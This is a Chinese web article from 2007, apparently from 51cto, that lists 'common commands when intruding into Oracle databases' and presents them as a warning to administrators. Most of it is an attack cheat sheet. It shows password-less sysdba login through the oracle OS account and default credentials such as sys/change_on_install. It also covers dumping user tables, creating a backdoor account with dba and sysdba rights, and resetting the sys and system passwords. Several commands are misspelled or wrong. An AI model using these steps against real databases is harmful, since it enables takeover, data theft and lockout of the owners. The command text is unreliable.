入侵Oracle数据库时常用的操作命令整理

您所在的位置：首页 > 网络安全 > 应用安全 > 数据库安全 >

入侵Oracle数据库时常用的操作命令整理

http://netsecurity.51cto.com 2007-03-26 17:49 孟翔飞赛迪网技术社区我要评论(0)

摘要：本文给出作者整理的入侵Oracle数据库时常用的操作命令，希望能给数据库管理员一定的警示，注意减少漏洞，防止被黑客利用来进行攻击。
标签：操作命令入侵 Oracle

1、su – oracle 不是必需，适合于没有DBA密码时使用，可以不用密码来进入sqlplus界面。

2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;

3、SQL>connect / as sysdba ;（as sysoper）或 connect internal/oracle AS SYSDBA ;(scott/tiger)

conn sys/change_on_install as sysdba;

4、SQL>startup; 启动数据库实例

5、查看当前的所有数据库

select * from v$database; 
select name from v$database; 
desc v$databases; 查看数据库结构字段

6、怎样查看哪些用户拥有SYSDBA、SYSOPER权限

SQL>select * from V_$PWFILE_USERS; 
Show user;查看当前数据库连接用户

7、进入test数据库：database test;

8、查看所有的数据库实例：

select * from v$instance；

如：ora9i

9、查看当前库的所有数据表：

SQL> select TABLE_NAME from all_tables;
select * from all_tables;
SQL> select table_name from all_tables where table_name like '%u%';
TABLE_NAME
------------------------------
_default_auditing_options_

10、查看表结构：desc all_tables;

11、显示CQI.T_BBS_XUSER的所有字段结构：

desc CQI.T_BBS_XUSER;

12、获得CQI.T_BBS_XUSER表中的记录：

select * from CQI.T_BBS_XUSER;

13、增加数据库用户：(test11/test)

create user test11 identified by test default tablespace users Temporary TABLESPACE Temp;

14、用户授权

grant connect,resource,dba to test11; 
grant sysdba to test11; 
commit;

15、更改数据库用户的密码：(将sys与system的密码改为test.)

alter user sys indentified by test; 
alter user system indentified by test;

【责任编辑：火凤凰 TEL：（010）68476606-8007】

上一篇：构造SQL Server的安全门下一篇：保证Web数据库安全认真把好七道关

查看所有评论()

频道推荐

更多>>

热点标签

刀片服务器云计算 ARP攻防思科培训

全站热点

更多>>

ARP攻击防范与..

2009年上半年..

技术人

更多>>

乔布斯病假月底..

魔兽易主，三大..

读书

更多>>

亮剑.NET. 图解C#开发实战
作者：李新峰付志涛缪勇
本书采用全新的图解思路，分3篇介绍使用微软C#语言开发实际应用程序的基本知识。第1篇包括10章，介绍了C#语言的基础知识，主要..

优秀博文

更多>>